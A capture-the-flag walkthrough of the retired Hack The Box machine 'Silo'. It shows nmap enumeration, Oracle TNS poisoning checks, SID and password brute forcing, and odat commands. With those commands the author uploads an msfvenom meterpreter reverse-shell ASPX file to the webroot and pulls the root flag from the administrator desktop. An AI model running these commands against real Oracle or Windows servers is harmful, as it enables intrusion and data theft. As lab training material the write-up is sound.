I attempted this retired machine without reading the htb guides, I went through a lot of rabbit holes and eventually found that the oracle tns port 1521 is the entry point.
On testing the silo machine I found that it is susceptible to tns poisoning, searching on the web I found this invaluable article which describes the methodology of attacking Oracle database through its tns port – 1521, the pdf article can be found in https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
I followed oracle metasploit guide and encountered rabbit holes, at first while trying to use the oracle sqli modules I encountered oci8 error which after research I found this, thanks to g0tmi1k’s response in the forum, I then followed the instruction to the dot and got the modules working without error.
All the sqli modules against the silo’s oracle failed to escalate the user to DBA, after research I found that I can use the sqlplus to connect a user as sysdba and further research I found about
odat, I use the python3 script instead of the odat in the apt repository (I tried but has error),
odat is a powerful script that can execute command, remote file inclusion and data exfiltration on the remote oracle server; in conclusion from user until root can be done through the use of
In all this machine is a good practice on how to do oracle attacks by following the methodology introduced in https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
I am presenting the attack from enumeration, foothold until privilege escalation. Enumeration is very important in this machine, I will only issue attacks when I am sure that there is a vulnerable target.
To make odat working properly
You need to follow the instruction in https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux to the dot, to make the environment variable permanent I suggest you insert the path into your
Installing the files from oracle will allow you to use the metasploit oracle sqli modules, sqlplus client and odat properly.
Do a git clone from https://github.com/quentinhardy/odat and use
python3 to run the script, odat is available in kali’s repo, but you will run into error on the kali 2020 version (Linux kali 5.5.0-kali1-amd64 #1 SMP Debian 5.5.13-2kali1 (2020-04-03) x86_64 GNU/Linux)
The majority of the time I used to hack this machine is on enumeration.
nmap scanning took time to finish, while it was scanning ports will be reported, so I was enumerating whenever I saw some ports reported without waiting for the entire nmap scanning process to finish.
My first enumeration was against the web, because tcp 80 was reported first by nmap, so I used tools such as
dirbuster, the directories and files enumeration did not give me anything useful.
My next check was towards rpc and smb, but both services were access denied from unauthenticated user.
The next enumeration was interesting after nmap reported tcp/1521 (oracle tns port), my hunch told me that this could be the way to a foothold. This hunch was developed after owned a few HTB windows machines, most of the windows machines have web, dns, wsman, ldap, smb and rpc but silo was my first windows machine which has oracle database port so this abnormality triggers my hunch to investigate oracle port.
nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82
# Nmap 7.80 scan initiated Thu May 7 13:12:19 2020 as: nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82 Increasing send delay for 10.10.10.82 from 0 to 5 due to 43 out of 107 dropped probes since last increase. Warning: 10.10.10.82 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.10.82 Host is up, received syn-ack (0.18s latency). Scanned at 2020-05-07 13:12:20 +08 for 3875s Not shown: 63244 closed ports, 2278 filtered ports Reason: 63244 conn-refused and 2278 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns syn-ack Oracle TNS listener 22.214.171.124.0 (unauthorized) 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc syn-ack Microsoft Windows RPC 49154/tcp open msrpc syn-ack Microsoft Windows RPC 49155/tcp open msrpc syn-ack Microsoft Windows RPC 49160/tcp open oracle-tns syn-ack Oracle TNS listener (requires service name) 49161/tcp open msrpc syn-ack Microsoft Windows RPC 49162/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 3m13s, deviation: 0s, median: 3m13s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 9149/tcp): CLEAN (Couldn't connect) | Check 2 (port 52707/tcp): CLEAN (Couldn't connect) | Check 3 (port 38458/udp): CLEAN (Failed to receive data) | Check 4 (port 26445/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-07T06:20:02 |_ start_date: 2020-05-07T04:50:06 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu May 7 14:16:55 2020 -- 1 IP address (1 host up) scanned in 3876.32 seconds
I was using
dirbuster at the same time, I was search for directories and files.
the original page is an IIS default page:
gobuster with this wordlist
/usr/share/wordlists/dirb/big.txt gave me two directories
dirbuster it gave me three aspx files in
/aspnet_client they are
"britney spears".aspx and
"joe roehm".aspx, these are rabbit holes which gave this:
Oracle port enumeration
I research from the web about tcp/1521 exploit and found tns poisoning.
A test with the
tnspoison_checker module reveals that port 1521 is vulnberable to tns poisoning.
So what is the technique to exploit the tns poisoning? I found this article which helps me use a systematic way to attack oracle tns port.
In short to attack oracle there are 4 things I need:
- IP address of oracle server, which is known
- Oracle listening port, which is known.
- Username and password of oracle user, which is yet to be found.
- the Service Identifier (SID) of oracle, which is yet to be found.
To find the username and password, I need the SID of oracle. I set the
false, in order to suppress failed information and display only success information.
Brute force username and password with found SID
Follow this guide to the dot if you have
I use the
oracle_login and set
XE and run the brute force, this process will take a while which may lead you to misunderstand that the brute force is stalled, please wait patiently until the result is displayed.
The username and password are
tiger they are in lower cases.
A foothold is found by using
odat to perform remote file inclusion, remote command execution and remote file download.
Oracle privilege escalation
All my available sqli modules in metasploit have failed to privilege escalate scott to dba.
After research I found that I can use sqlplus to test if I can elevate scott, and further research I found odat to easily do remote file inclusion, remote command execution and remote download file.
This is the command to test
sqlplus firstname.lastname@example.org:1521/XE as sysdba if you can get a sql prompt means escalate to sysdba is anytime.
Remote file inclusion with odat
dbmsxslprocessor is used for file upload.
To know more about the options
python3 ../tools/odat/odat.py dbmsxslprocessor --help, there is a command
--putFile which is used to upload my shell code.
To generate a shell aspx file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.33 lport=1337 -f aspx -o hello.aspx
To upload file with
python3 ../tools/odat/odat.py dbmsxslprocessor -s 10.10.10.82 -U scott -P tiger -d XE --putFile "c:\inetpub\wwwroot" "hello.aspx" "/home/cyruslab/htb/silo/hello.aspx" --sysdba
Set up the multi handler:
Start the reverse connection:
Get the user flag
Get the root flag
odat has made getting the root flag really easy. to execute command and download file use the
externaltable, I tried the
dbmsxslprocessor to download file but failed.
python3 ../tools/odat/odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --getFile "c:\users\administrator\desktop" "root.txt" "/home/cyruslab/htb/silo/root.txt" --sysdba